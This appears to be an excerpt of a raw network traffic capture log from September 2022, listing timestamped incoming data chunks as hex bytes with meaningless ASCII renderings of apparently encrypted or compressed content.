                                                                                                                                                    2022-09-29 12:59:02 UTC6353INData Raw: 1f 27 c0 a9 80 88 b2 67 ae 2d 82 49 e0 2a ce 44 04 92 3c fd a2 80 ca d2 1a 93 96 29 3f d5 fc 46 ea 41 e4 bb 5c 71 a1 7a 79 78 e2 92 e4 7f 0a e5 94 a9 ef 0e 19 81 ab 01 16 cc fa 91 a6 19 e7 ff a0 2b cb 48 4b 90 ff 44 46 30 58 8f 0e e8 64 07 d0 b9 52 37 82 44 d6 c9 9d e3 ac 23 e1 44 85 28 03 0d df 13 30 0f ae 5c a7 21 be 40 da 91 01 85 ff b8 39 93 3a fe 3c 77 3b 1a 14 b8 7c ac 20 f7 9f e7 80 71 14 56 ce 1a 40 92 b4 a3 26 df 21 ec 87 83 1c 90 9a 3c 51 00 88 c0 c3 1f 7e 21 a5 69 db 07 21 ad f0 00 64 a5 88 8a 17 d7 f4 22 9c 7d 6d 32 b9 c0 d1 61 2b 60 7c bd 7e 1a cc 63 dd 6c 94 a6 be 45 97 b8 2d 97 83 a4 99 b5 00 27 9e 4a e2 ec 2c e6 8e a8 4a a6 cb 93 5e fb 69 05 ad c7 9b 11 1e 6b f4 08 5b 70 d0 4b 91 17 b1 36 96 6b c6 0f d1 46 94 67 76 a6 a3 f5 5b c4 be 2e 7b
                                                                                                                                                    Data Ascii: 'g-I*D<)?FA\qzyx+HKDF0XdR7D#D(0\!@9:<w;| qV@&!<Q~!i!d"}m2a+`|~clE-'J,J^ik[pK6kFgv[.{
                                                                                                                                                    2022-09-29 12:59:02 UTC6369INData Raw: dd 2e 55 64 21 8f 52 45 ab 78 c4 c7 4c f0 bd d7 84 53 99 0e 60 c0 7e ee 7d 7e cd 2d 9f 58 aa 6f f8 88 20 f1 42 d7 4a 4b 78 2d 65 ab da 7e d7 a1 5d d8 6d ba 9c 60 b0 23 b7 59 1d d4 c4 f2 9d af cf cc d9 d9 ea 96 26 97 96 90 76 c7 ce 1e f8 53 ea ce 2e bc f6 8e 8d 37 c2 36 fe 67 3f 0b 3d 7b 50 1c 93 d4 98 ec da 60 2e 53 20 bd c6 7d 3b 32 bd 14 6a 97 25 28 c6 73 c4 09 e4 df 10 a7 c5 1c 6a d3 2f 7e 79 41 91 bd a8 e5 cd 88 a8 52 f6 04 95 97 de 6d 88 22 3e 71 01 a0 f9 17 e1 d0 78 f8 f0 36 eb 2b d0 6d cc bf dc 95 30 3b ca 14 67 3e 4f 97 1c 02 80 09 5f 18 0a b3 cb 63 c6 8f e9 18 fb 32 eb 08 20 d6 89 e9 45 0b fa 56 c2 58 ae 70 18 62 ce 1f b0 2d e8 bd 53 cf ef 27 51 13 79 03 db 5c 3f 1c 6d 7f 71 54 3d 60 40 0e a7 bc b1 d9 2b e5 2e 09 d4 51 99 84 36 5e 71 ac e9 7b 39
                                                                                                                                                    Data Ascii: .Ud!RExLS`~}~-Xo BJKx-e~]m`#Y&vS.76g?={P`.S };2j%(sj/~yARm">qx6+m0;g>O_c2 EVXpb-S'Qy\?mqT=`@+.Q6^q{9
                                                                                                                                                    2022-09-29 12:59:02 UTC6385INData Raw: da 19 5a 12 22 98 04 c7 d5 31 84 fd 12 42 e9 2b 0f 89 f9 db 66 33 2e d9 6c 6d d8 5d 71 69 e6 70 9b 29 f4 da db 96 d9 52 0d 5b 36 5b d4 a3 7b b0 7b ee 03 5e 4a cf 15 90 fe f7 cb da 12 bc 4a c0 ab d9 49 33 dd 67 67 55 c4 25 ce 49 20 67 7b 57 81 f5 d0 9e 77 7f bd 99 cb a5 74 38 b3 62 07 2a e3 1f 02 a4 62 77 38 48 0f 05 95 5d 90 bd 27 1a a1 43 5b 78 45 ea a5 40 fa d2 b9 25 f7 8f 2b e5 33 9d 41 6b d7 3c a4 28 ae 7d e3 0c ee 9b 66 b2 e0 b1 71 3e 52 ef 7c 6e 62 fc 86 bd ee a9 53 af 0f 89 87 80 a7 8f aa 15 6b 4f c4 f7 8f 3b eb 18 0e ce 60 e2 56 a4 24 f3 31 f5 24 39 2b 3e de 1f 67 fe 46 11 c0 cd 14 a3 fc c7 f4 eb 28 ab 9a 6c 08 3f be 88 35 3a a6 74 ce ba 91 fc db 6f b1 b5 67 9f bf 38 da 1b 47 d5 cf 50 54 9b 8c 46 24 b9 7e fc 22 54 42 46 18 4c 61 2b ac 52 df 5a d5
                                                                                                                                                    Data Ascii: Z"1B+f3.lm]qip)R[6[{{^JJI3ggU%I g{Wwt8b*bw8H]'C[xE@%+3Ak<(}fq>R|nbSkO;`V$1$9+>gF(l?5:tog8GPTF$~"TBFLa+RZ
                                                                                                                                                    2022-09-29 12:59:02 UTC6401INData Raw: 8f 78 a4 d7 db db 79 93 3e 23 19 28 34 ed 55 b4 8c f0 45 9e d1 b0 86 73 86 78 61 0d a1 42 6b 65 05 8a 9f 7e a6 c8 70 9a 17 57 a5 18 02 b7 5a 20 3f f8 5f c6 46 e1 00 b8 52 73 76 81 67 ab b6 a9 34 6c ce e1 f7 1e 52 f8 11 aa 6e e7 56 5e 60 cd be 3a 26 ae c9 c0 51 b0 16 27 5b 72 a1 ab 3e 93 e3 0f 0f f2 41 ef af ee 93 4d 71 42 7b 19 b6 6c 18 1c d9 50 1e 0b 82 a3 a5 cc 95 c8 50 38 2c 65 93 6f 16 1d af fd 89 e9 d5 32 67 91 68 04 d9 ad 9e 36 b1 57 f7 44 4e 26 f3 f7 38 a6 72 97 98 b3 44 53 af 5e 03 c6 06 ae fe af 07 42 3d b8 e2 78 a2 d0 c3 ff b4 c8 95 8e 43 82 b3 d3 ab 2b 92 f1 50 af d7 38 21 11 19 f4 7e 50 ee 57 c0 d9 6a 65 9a cd 22 fc 3d 27 9c 60 cf 9f c4 06 c5 6a 87 fb 29 1f 71 b5 a4 4b 7c da 1b f1 c6 36 8b 23 6d c9 8a 7c ec 53 f1 2a c8 30 7f 83 f5 87 9d a0 da
                                                                                                                                                    Data Ascii: xy>#(4UEsxaBke~pWZ ?_FRsvg4lRnV^`:&Q'[r>AMqB{lPP8,eo2gh6WDN&8rDS^B=xC+P8!~PWje"='`j)qK|6#m|S*0
                                                                                                                                                    2022-09-29 12:59:02 UTC6417INData Raw: 89 a5 03 37 da c1 fa b1 cd d3 1f bf 40 6e d3 b0 ae 5a a0 d6 a4 5f 8d 72 6a d0 ee fd 6e 58 24 4a d3 2e bc 5c 92 79 ee 75 97 ab 7f c1 2d 4e 4a a4 9b 62 a3 47 a7 08 dd 41 91 30 79 d0 4c 81 53 39 f1 c9 be 36 c2 80 51 b1 2d 32 89 fa 35 3a a4 f6 99 a9 e9 bf 6a 0b b0 ef ac 64 e5 ae 65 4f 7e 7b 42 51 10 65 76 9a 69 39 c4 0a 7c 2f 24 d1 3e 65 13 67 09 1e 50 2c 1c 31 b2 ea 25 9d 42 3c 25 87 72 44 ac 62 83 ac 9a e8 ce 8a 66 50 bb ad b7 48 7f 1d 15 f0 7c da cd 70 7f 08 2d 68 94 a8 40 9a 5d 8e c1 d6 a5 e7 26 f8 93 f6 97 3f 2f 6d 51 7e aa c2 b0 c9 83 bf e6 a7 a8 ab 0a 32 6b 77 28 77 2a 05 0e 8f 31 a2 92 92 07 d1 2a 35 df 71 7f 52 b5 dd 2c df 09 33 58 bd a7 45 16 1f c9 09 4f 36 83 99 99 8a a7 db cb 8c d6 0e a8 8c 2b 6c 97 51 67 ac 94 85 db 14 72 6c 91 f5 e3 13 82 40 d7
                                                                                                                                                    Data Ascii: 7@nZ_rjnX$J.\yu-NJbGA0yLS96Q-25:jdeO~{BQevi9|/$>egP,1%B<%rDbfPH|p-h@]&?/mQ~2kw(w*1*5qR,3XEO6+lQgrl@
                                                                                                                                                    2022-09-29 12:59:02 UTC6433INData Raw: 94 89 bb cb dc d1 65 8f 05 cf 17 57 8a 4b 75 43 32 76 35 fc 62 4c 57 d8 b1 ac 82 34 0e f5 9a 79 d0 56 7e dd ba 54 47 df 8e ca 55 fe be 00 86 95 94 7d 01 69 9f 0b 7a 86 6f ea 45 5b db 12 b6 bc ed 58 4e 5c f5 85 ac 8d b0 00 8e 86 38 78 ee 58 0d 24 08 2d 9d 88 a4 54 96 bf 4d 13 23 cc 9f ec f2 f5 cb ff 3d 02 84 5c 01 f7 f5 23 08 fc f3 27 3a 70 aa 25 a2 e9 9f 13 6e 04 b9 41 28 21 40 5e f9 48 7c 83 e9 1e 33 94 9d 2a 8b 76 c1 c0 99 e7 6b 6a df e3 c1 8b 2c 4d fa 95 e9 a9 a6 5c 1c a2 b2 02 89 fa 9d 0f e2 88 4b 5a 1c 46 ec b0 f3 39 b5 12 46 3a c1 a6 b6 78 f0 2d 67 4a fe d5 f8 6a 28 a7 2a 2e e7 a4 a0 50 dc 91 71 39 4a 46 4a 68 b8 d5 aa 81 62 59 a3 0d 67 df eb 43 46 6d 40 68 ec 4e 7e 14 1a 8b 70 b9 5c 75 c6 43 82 94 22 00 8c 0b f4 11 ce e8 70 df 8b 95 e8 81 54 85 cd
                                                                                                                                                    Data Ascii: eWKuC2v5bLW4yV~TGU}izoE[XN\8xX$-TM#=\#':p%nA(!@^H|3*vkj,M\KZF9F:x-gJj(*.Pq9JFJhbYgCFm@hN~p\uC"pT
                                                                                                                                                    2022-09-29 12:59:02 UTC6449INData Raw: 91 47 99 62 15 4a ff 58 57 93 7f 44 8c aa 2b 0e c2 86 b1 24 d2 c1 f5 87 47 14 7e 02 55 15 61 7d a3 b9 b8 3b f0 53 0b 53 3e 1a d9 7b eb 42 1a c8 7a d4 e5 98 a3 f0 51 fb 2b e9 2b 69 3c 6d 94 b1 4f 95 c5 e8 71 81 60 78 aa fe 45 23 ef 0b f3 b5 48 c4 0a a7 ed 32 39 75 9e 90 fb 44 f3 13 6c 6b a7 81 9f f9 2c 83 21 d5 dd b0 3d 25 64 a3 c8 12 57 8e 46 54 9b 80 09 a7 52 52 77 d5 d0 9d 7b 50 4d 54 6a 4c a2 7c e7 85 53 1d 24 3e 87 bc 46 5d 64 7b fe 2e 54 82 13 31 a4 20 6d 4e 6d f5 47 a2 fc 77 39 6d f0 ad 99 66 5e 80 36 3d c6 6d 87 53 1d 5f 84 c6 00 35 0e 10 2e 7d c2 b2 33 4a 36 0e 9a 42 44 e4 43 23 f3 14 8e 6a 3d 1d 3e 9f 8f e4 aa 7d 18 b7 01 db 16 fe c2 d5 d7 9b 0f e2 49 71 82 87 4c 8d 84 40 a8 88 dd ca 7a 24 00 97 fe 7b fb 51 b8 53 29 a8 39 6e f3 72 5f 7c 50 68 53
                                                                                                                                                    Data Ascii: GbJXWD+$G~Ua};SS>{BzQ++i<mOq`xE#H29uDlk,!=%dWFTRRw{PMTjL|S$>F]d{.T1 mNmGw9mf^6=mS_5.}3J6BDC#j=>}IqL@z${QS)9nr_|PhS
                                                                                                                                                    2022-09-29 12:59:02 UTC6465INData Raw: 87 e9 1b c8 89 4b 45 36 a4 36 e3 a4 e6 6b ed 3c 61 44 e7 af f3 8f 6e d2 bb b0 1c 0c 22 a4 9e 77 0e b2 89 e5 7b da c4 50 50 a1 c3 50 75 f1 c8 d0 55 7c f8 ab bf 7b 68 42 b0 e2 8c 85 56 51 d9 fc 02 79 5c c7 7c 30 f4 bb ce 78 81 3d c8 be 6b 24 21 d8 e6 78 ad 57 f0 6d 52 10 75 dc 38 4d 2a 7a c7 28 17 23 4f 1f c6 3a c4 11 88 4d 53 93 80 8c 72 f0 38 8b 66 61 69 43 06 b4 ab d4 48 52 db 54 0f fe f1 11 f4 c4 25 0e 58 7d e9 65 82 ab 8b b3 cb 2f e1 d4 7b cf 2c 98 e2 23 87 ad 72 11 42 f4 f6 36 d4 60 d4 7f a5 c3 f4 75 6e 6f f5 00 2f c3 76 c4 ef 8a c7 1d 2a bd 79 e8 80 76 bc a7 05 00 81 22 b7 dd 26 d1 8e 98 04 4f ae c0 65 2e 72 72 b3 41 7e ab bc 38 8b e2 41 c2 bd a8 cd cc 24 f1 74 00 4d fb 09 47 63 de 71 95 3d fe e2 75 27 c3 a8 58 47 31 71 c4 48 26 57 12 56 aa de 36 5f
                                                                                                                                                    Data Ascii: KE66k<aDn"w{PPPuU|{hBVQy\|0x=k$!xWmRu8M*z(#O:MSr8faiCHRT%X}e/{,#rB6`uno/v*yv"&Oe.rrA~8A$tMGcq=u'XG1qH&WV6_
                                                                                                                                                    2022-09-29 12:59:02 UTC6481INData Raw: e2 90 8e 3a 9e 24 cb 2a 50 b9 69 4f 91 97 b5 a9 70 23 c1 82 03 8e cb f2 b7 f3 4a ed 07 96 bd ec f2 53 93 79 a6 3f 68 2b 17 39 df ca 5b c3 b1 f4 66 1f d0 28 bd 3f 66 0b 15 c1 a1 8b 64 56 1d b9 7f 87 89 c4 d7 ce 85 57 08 50 bf 69 50 4f 78 ca 6d 78 6c b0 0f 6d 72 a3 d5 b2 79 22 26 f1 50 99 5d 72 ce 43 1e cb 28 ac 7d a7 28 ed 9d 4c f9 a4 ba ab f3 e9 21 dc b4 90 85 a9 2f 3c 85 d7 5a 51 90 63 0f d6 8c 42 18 b0 6c 4f 0b 99 a8 45 69 74 f3 a7 26 0b 23 b2 75 ad 5d be 4d 57 97 7c 0a 15 35 14 d7 40 60 af de ba 52 51 c4 cf 9d eb 8f 19 17 11 c6 c5 3e 0d 97 e5 00 d6 ab da f1 58 49 72 f0 1c f1 c9 8f be 95 68 a7 bf 3a f4 e7 5c 9d 47 77 e8 21 30 9f 87 d1 f5 72 74 d1 04 e3 30 3f aa 8d 1d 00 03 3b 47 24 87 30 12 76 01 fd c3 c0 5c d8 60 83 01 b3 65 6a 28 cf 25 5a 31 33 0d 23
                                                                                                                                                    Data Ascii: :$*PiOp#JSy?h+9[f(?fdVWPiPOxmxlmry"&P]rC(}(L!/<ZQcBlOEit&#u]MW|5@`RQ>XIrh:\Gw!0rt0?;G$0v\`ej(%Z13#
                                                                                                                                                    2022-09-29 12:59:02 UTC6497INData Raw: 34 3f 6c 10 25 34 45 0b 3b e7 dd aa ae 85 ad b2 0c cd ff 4a de 27 e3 72 7d 2e c5 16 be f5 25 05 69 ec e8 4c 5a 8c bb d3 54 1e 8b e6 a5 66 1c dc 08 34 5a 45 e3 5c 1c 0d 62 cd a4 12 8e 80 8f 35 03 0a a6 88 18 0d 66 09 82 f2 c8 c2 8c f2 6a c3 52 c5 bd 0f bf f8 c6 6a 02 c8 03 d5 d8 d3 ad ba 9b 39 a1 f9 17 42 e8 e6 bb 14 7a 8c a3 5d fe 79 66 1c a7 26 2d f5 81 6e 60 ef cb a2 e6 87 ff d9 b6 f4 7c 6d f1 92 12 35 58 1d 42 9e f9 fc f6 e9 e7 06 43 01 7d c2 26 f4 3e e3 34 22 e7 11 8f 0e b2 dd ed d9 bf 86 24 e1 27 3c 00 47 e2 8f de 4b 1b 2e a6 54 3f f1 47 28 46 53 53 5b 86 ec e9 3b c9 dd bb 42 77 a9 ca 9a 32 1c 6f 93 ad 75 f0 79 b8 64 8d 05 62 15 5e 6c f1 cc 41 08 68 5e d1 94 0f 0d 4b 49 82 14 57 86 32 c0 3b cf d1 d8 54 b7 0e 6e ee 1a a1 58 a4 af c8 65 82 86 ad 08 72
                                                                                                                                                    Data Ascii: 4?l%4E;J'r}.%iLZTf4ZE\b5fjRj9Bz]yf&-n`|m5XBC}&>4"$'<GK.T?G(FSS[;Bw2ouydb^lAh^KIW2;TnXer
                                                                                                                                                    2022-09-29 12:59:02 UTC6513INData Raw: c7 be be fc 95 f4 26 7a 1f eb f7 4c cf 9f 27 79 32 94 10 86 db 24 91 d0 5b 98 a5 84 e9 12 92 54 86 56 9b aa b9 51 48 e7 38 51 29 fe 11 ce 44 0d 5c 3f b9 c3 c8 01 8e 85 77 56 ce c8 51 4f 6a f0 a9 80 00 bb 9b 28 ea 0f e4 ec fd 58 94 b8 a2 c5 ba 58 08 dd a8 2d fe a4 0a 95 94 04 b0 7e 33 10 0c 40 fd d4 bb ce 03 29 99 e2 a2 aa 1b 54 07 b7 3a d3 36 6f 91 91 60 aa 0b 2e ab 08 ef 86 df f8 d5 0b b3 4d 29 61 2a d7 8f 30 ac a3 a4 85 a4 81 34 f5 ea 93 4b cc df 79 24 78 13 2d 0e 87 65 90 8e ff c8 cb 99 91 23 b6 53 a5 1e c9 e9 44 7b 4e 5b 5f f2 17 be e6 e2 a7 1b 22 d5 19 79 ff 8b 5b b2 9c 19 41 6b 0d 71 9d ec 70 2e f6 92 23 a4 8f 96 8b 1a 4a 4c 7a 99 05 d6 4d 1f 46 82 92 4d bc ce 72 2b 49 8c d6 47 e8 30 2a 96 82 a1 2e f9 8a d1 92 65 62 fa 3f 6b 19 c1 63 f6 6d 0a 04 f9
                                                                                                                                                    Data Ascii: &zL'y2$[TVQH8Q)D\?wVQOj(XX-~3@)T:6o`.M)a*04Ky$x-e#SD{N[_"y[Akqp.#JLzMFMr+IG0*.eb?kcm
                                                                                                                                                    2022-09-29 12:59:02 UTC6529INData Raw: ed 94 fb cf 3c ad ab 3e e8 54 69 7f cc 30 c0 c9 ed 0b 4d 47 2e 30 b6 96 d6 ed 31 16 5c 7d 12 14 d0 b7 b2 53 a7 f8 f8 56 5f 16 b9 0a b9 9d 0b 47 ec 1a ca d0 f6 14 77 97 53 7b 16 0f aa ca 50 ae 31 48 51 5d b5 2d 7c 72 3d 37 7d 84 c2 25 19 a2 21 dd 51 03 cd af 17 e5 0e a2 dc ff 28 75 d3 30 2d 77 f0 55 53 a0 fa 4d a2 43 66 b0 b8 21 5b bc 32 04 01 bf 11 2c d9 79 87 ec b7 83 44 3a ed cb 34 32 73 92 c7 3b 1d 56 e1 0d 81 49 5d f9 66 be 07 d6 7f c6 a8 6b 4f 5a 94 0e 16 fb 07 3c d7 df 9d 40 2a b8 77 55 44 00 e9 85 ed 69 03 e3 38 58 1b a8 e3 81 20 bb dc 2c fb b2 2f e5 ec 11 5d ed 42 d2 41 f3 4c b1 c8 ab e6 e7 f3 62 bf 87 d5 ec c2 f7 c3 92 90 3a ad 77 f5 e6 ca f4 b9 f2 08 18 36 f1 09 7a c0 4f 56 76 65 b7 1b 6e 4b a6 fe 54 7b be 47 d0 52 f4 b2 13 4d 0f c3 b4 5a 5d 4d
                                                                                                                                                    Data Ascii: <>Ti0MG.01\}SV_GwS{P1HQ]-|r=7}%!Q(u0-wUSMCf![2,yD:42s;VI]fkOZ<@*wUDi8X ,/]BALb:w6zOVvenKT{GRMZ]M
                                                                                                                                                    2022-09-29 12:59:02 UTC6545INData Raw: 2f 8c 67 49 4b e5 1f 84 6a 4c d6 de e3 f2 0a 15 a6 19 6d 1a 69 37 74 cc 47 9e 3e 3b c1 90 94 e4 56 15 d7 8f 13 1a 5c 21 0a f4 ab f1 dd ce 65 3c 32 9d b6 24 46 c4 d9 bc 10 26 ac ed 83 c2 19 bd 60 08 3e bf 2f 67 c8 50 38 35 23 47 da cd ef 7a 0e 4c 92 d3 d1 14 38 63 b3 88 71 f6 9e 8f e2 ed a4 83 9d c9 c8 45 19 16 6a 59 ce 02 b2 61 ab fc 12 06 45 fe 88 e1 5b f7 a3 e8 98 03 cd aa 7c ea 76 38 45 2e 50 50 3c af ce 0e f6 b5 6c 33 e7 42 fa ef c7 b7 93 d6 b3 2a 7c 77 13 08 8a 99 f5 b4 c2 bf 47 b7 9c d6 11 4e 1a 27 54 bf 47 d4 2a 9a 6f e1 1c c6 8e 8c cd fa d8 06 38 83 fc cd c5 9e 3d 6f 44 56 67 49 df 03 03 69 74 95 ac f4 80 1a 9e 03 d6 e5 ae 2b 78 80 a8 ff db 8a 23 04 ad 61 56 66 bd bf 75 b3 ea 20 22 a5 4d d8 44 b2 82 63 3d 59 88 6f 47 f0 d2 66 c9 94 f0 68 da 00 84
                                                                                                                                                    Data Ascii: /gIKjLmi7tG>;V\!e<2$F&`>/gP85#GzL8cqEjYaE[|v8E.PP<l3B*|wGN'TG*o8=oDVgIit+x#aVfu "MDc=YoGfh
                                                                                                                                                    2022-09-29 12:59:02 UTC6561INData Raw: ce d8 48 6d 61 fb 0f db dd fd e7 54 6c f7 38 d4 e6 2e a2 99 61 e9 5a 72 8a 6b be cd 4d 84 44 c6 22 7d a6 a6 4b de 48 79 8c 9b 03 69 9e 96 95 be b1 24 de 6b 29 dc 58 c7 b7 84 6b bd a2 56 1f 4d 24 ff d5 e2 cc cd 8b d0 3e 36 98 8d 0b 74 6b b7 8f 6d e2 7d 21 1a c2 22 a8 2d d5 31 d3 fe 1a f9 df cc f4 83 f7 15 fe ae 6c 3b b3 68 2b 8d 1c 30 fe b7 8e c6 be cb e2 7b 40 f8 7a bd be cd 4c 30 de 97 fe 1f 27 9a cf 4e 4a 45 4a d9 1e c7 79 56 3f 5e e9 f4 77 44 4c 99 7f 47 60 aa 85 be ea f5 46 62 c7 6b 6e df 9d 32 02 e1 30 0d 63 ac d1 c7 bd b2 02 ea 77 29 38 31 0a 3a 62 bb f5 56 74 3a 7a b2 c6 00 00 98 d0 ca 1b c0 ac ee 89 7f 08 d1 04 d9 af 01 cb b4 45 4c 82 b1 4d cc 78 66 6a 99 f7 05 48 c7 63 fb 9d 07 e7 5e 35 78 45 54 39 0a 93 49 89 d4 85 0b ce fd 6d a4 37 f0 21 f2 ab
                                                                                                                                                    Data Ascii: HmaTl8.aZrkMD"}KHyi$k)XkVM$>6tkm}!"-1l;h+0{@zL0'NJEJyV?^wDLG`Fbkn20cw)81:bVt:zELMxfjHc^5xET9Im7!
                                                                                                                                                    2022-09-29 12:59:02 UTC6577INData Raw: 1c 2c 2e 15 9c 11 f4 97 6b 44 12 50 b6 a4 ea 08 df a8 02 d7 25 5a 53 f4 09 db 13 99 84 ab 01 26 98 74 ec 77 17 b8 74 25 40 26 aa 5b 0b ec 6a 70 e2 87 80 53 3f 90 ee 93 6c 73 62 2b 0d aa 3d e8 4a 47 8b 95 11 fe 21 3b 69 66 92 2a 66 b6 b0 87 95 17 e5 d4 47 41 df 60 b4 f2 40 d4 11 30 23 ed 51 1b 4c f4 42 30 7d 8d bd 9e 6a 9e 07 6f 2b bc c4 d4 54 c1 55 97 6b 25 51 ed 00 73 78 81 7f 41 09 0c 34 d1 2c a9 a2 c7 ab 83 44 e5 5d 85 76 54 08 fe 48 69 ca 84 c9 a7 e6 69 eb 53 58 7b c6 10 6f 82 90 0f 6e e6 2a 40 4d c0 b6 ce ea 3b e2 fb c5 84 25 78 d4 72 d8 5a a5 1d ba b7 dc 42 ef 24 c7 34 42 b2 dc ce e0 9a b9 0c 07 62 97 ac 64 58 90 c1 8e fb 46 4d 28 e5 51 46 3c 9d 23 c1 1b ff e0 ce 6d c3 92 6a a7 5f 03 e2 50 b1 eb 5d 41 17 ed f0 07 dd 12 de 59 6c 0c 1c e9 a8 10 5a ae
                                                                                                                                                    Data Ascii: ,.kDP%ZS&twt%@&[jpS?lsb+=JG!;if*fGA`@0#QLB0}jo+TUk%QsxA4,D]vTHiiSX{on*@M;%xrZB$4BbdXFM(QF<#mj_P]AYlZ
                                                                                                                                                    2022-09-29 12:59:02 UTC6593INData Raw: 79 58 c4 cc af d8 99 96 e1 0f 9f 88 6d ff f6 96 ae 5d c4 14 73 59 a9 83 72 a8 9e e7 69 30 48 4e df db 16 bc 6e 1d f4 92 6c d1 7b a8 10 ae ba 7d f7 60 77 73 9a 49 7b aa ad 22 a9 1d b8 dc 91 a3 b8 21 70 8a 88 ef 6b 7c fb f7 73 76 31 04 b1 ac a1 fa 2d ec d2 4c 85 61 30 ff 31 c3 b3 e6 be 88 e4 35 05 a4 20 1e 7f 29 98 70 22 cc 5a 1b 52 43 a1 ea 1c 6f 1b a8 16 87 4d 80 32 6d cd 43 5a ea c9 e7 7c 7f 84 48 17 88 db 1c cf 2d 94 7e c7 08 31 81 6a f1 78 ca 34 90 de 3b 9d ae 9f 9d da fe b7 b1 1f 39 8f f3 c3 3e 45 cd e6 15 e6 11 77 d5 7a 2d a3 2d 63 08 da bf 8c d2 27 04 3d d0 85 af fe 94 3a 46 37 6b a9 8f 99 cb c1 2e 1c 57 77 1a dc d3 e6 60 5a f5 fa f6 ec 38 5d 4b f7 9a 3f 24 57 57 a7 bd 0a 32 59 bb d6 28 c3 b6 29 f9 ed b6 d2 07 f6 6e a6 bf b5 38 26 76 f4 dc b3 ce 86
                                                                                                                                                    Data Ascii: yXm]sYri0HNnl{}`wsI{"!pk|sv1-La015 )p"ZRCoM2mCZ|H-~1jx4;9>Ewz--c'=:F7k.Ww`Z8]K?$WW2Y()n8&v
                                                                                                                                                    2022-09-29 12:59:02 UTC6609INData Raw: 21 bd 77 86 73 eb 7b de 01 ac 85 98 9f c6 fa 53 d7 6c 3a 8e dc cf c3 80 8e 3a 96 7e f8 bd a6 39 0b f5 fb ed f3 d2 06 3c d4 8d ab f8 a8 ea 72 bd 22 4b 03 72 27 98 d7 06 08 c0 b9 b6 ee 2c 61 6c 1c 70 ef 4d 35 bd 64 ae 8b bc ba f3 b0 b5 74 4b 97 72 44 1c 7d 5d 54 16 b1 53 9f e7 99 9b ef 90 bf 35 55 35 48 40 fa 83 ac fa 6c b0 79 f9 26 e7 ed e7 0a 5e 69 80 0e c2 a6 15 ca 57 18 3e 66 da f0 8c bd 3b 9f bd 1c d6 12 f7 f0 30 0e 68 5f 0b 84 53 ec 44 5d 03 c7 28 a8 64 59 63 7d d5 54 2a 86 b8 37 a5 b6 4c 5d 8e 25 67 72 95 6b 67 da 08 ef d9 41 07 47 ea 15 70 3f a9 4a 78 07 e4 ba 2b 85 64 b5 98 ee b7 85 0a bf cd 72 df 81 4a c3 ba c5 74 45 50 dc ca da 94 26 6e b6 d4 93 f0 80 71 18 e2 23 59 06 fe e0 26 aa 89 01 29 b1 64 83 ec fd 68 43 3a 3c 1c a1 41 4d ec 1d b6 e3 e0 77
                                                                                                                                                    Data Ascii: !ws{Sl::~9<r"Kr',alpM5dtKrD}]TS5U5H@ly&^iW>f;0h_SD](dYc}T*7L]%grkgAGp?Jx+drJtEP&nq#Y&)dhC:<AMw
                                                                                                                                                    2022-09-29 12:59:02 UTC6625INData Raw: 92 1d 02 ac 0f 2e 5d ba de 16 4c a6 66 be 46 e8 b8 15 02 63 f3 9a 90 14 16 6f d0 43 97 97 30 a3 4c 30 f7 fb c0 d7 c2 c2 b0 1b 44 08 78 4e a7 b5 76 6c 40 69 1b b2 97 7c 7b 6f 0e aa 76 ed 5c 0d 88 1c 9c ca 2f 88 2e a2 1a f9 71 6f d6 89 53 00 c7 da 61 c5 d7 70 48 0c 19 3e 0c 04 a0 71 a2 33 16 73 bc 63 7a 8c 41 67 df 4e 18 c2 74 92 12 88 83 53 97 55 4c 5e b0 3f ff 70 f1 f8 55 12 e7 fe d8 58 f1 48 58 11 f1 a3 83 d2 30 cb 8c 21 4d 30 ef f3 04 15 a1 41 f9 ce 26 e5 1b 07 f8 ee ce d1 47 a8 c2 6b ba ee 82 08 cb 2f b8 c6 cd c7 3c 03 52 03 4a 21 48 f8 44 4e f7 12 95 f1 9a 52 82 b5 7e a6 dd 3c 68 6a 55 69 d2 f0 62 cd 76 42 4d 7f b0 82 64 5b 8f 7e 27 3d 7c dc f9 f9 a7 cd 5e 1f 8d f4 9c ba 79 b2 d8 6f 6e 87 86 6b 0e 1f 98 ec 5a 8b 37 13 60 65 97 b1 93 0b b3 47 11 24 dd
                                                                                                                                                    Data Ascii: .]LfFcoC0L0DxNvl@i|{ov\/.qoSapH>q3sczAgNtSUL^?pUXHX0!M0A&Gk/<RJ!HDNR~<hjUibvBMd[~'=|^yonkZ7`eG$
                                                                                                                                                    2022-09-29 12:59:02 UTC6641INData Raw: 67 c7 6e 65 dc 4a f5 42 03 d7 8d 33 1b c0 2b d3 48 67 d7 92 53 d5 99 0d aa 0b 4f ba 96 bf 4a ef 55 e4 7c 43 cf 52 c6 aa 0b 36 38 d3 fe d4 48 b1 ea ae d8 e2 29 80 a8 02 f8 eb 0e 22 d2 84 b9 09 d3 f4 58 87 64 6a 4b 3e 5b e9 5c a7 ee 4c 7f be 06 fe cb ab ea 59 df 59 d3 53 b2 33 6d 9c e9 de 96 c0 11 fd 3f 37 d6 0d 72 b0 ee c6 79 1e 9f d6 14 ce 93 3b bf 9e 8b 07 c1 90 49 0d 5d ef f9 c6 5c d9 78 4b 2b e2 9f 8c 27 b3 58 e6 05 6b d2 96 a8 a4 79 8d cc 4b 50 9c 57 74 ed 19 93 1a e3 62 8f f6 30 e6 ee bc 55 d7 db fb af 6a c4 0e 13 d5 0c 38 c2 3f 46 91 8a 10 b4 71 e4 02 37 1a a6 9d 51 82 cf dd 93 0e ba 03 be 7a e4 43 e3 f3 08 ea e9 ff 61 65 d3 c7 61 1d 82 b5 6a 45 2b 80 51 84 29 98 59 c3 cf 47 79 8d a7 2e f6 0f 75 7d 8a 5e f7 73 e5 a6 c7 2c 3b f7 51 41 d0 aa a4 2f 69
                                                                                                                                                    Data Ascii: gneJB3+HgSOJU|CR68H)"XdjK>[\LYYS3m?7ry;I]\xK+'XkyKPWtb0Uj8?Fq7QzCaeajE+Q)YGy.u}^s,;QA/i
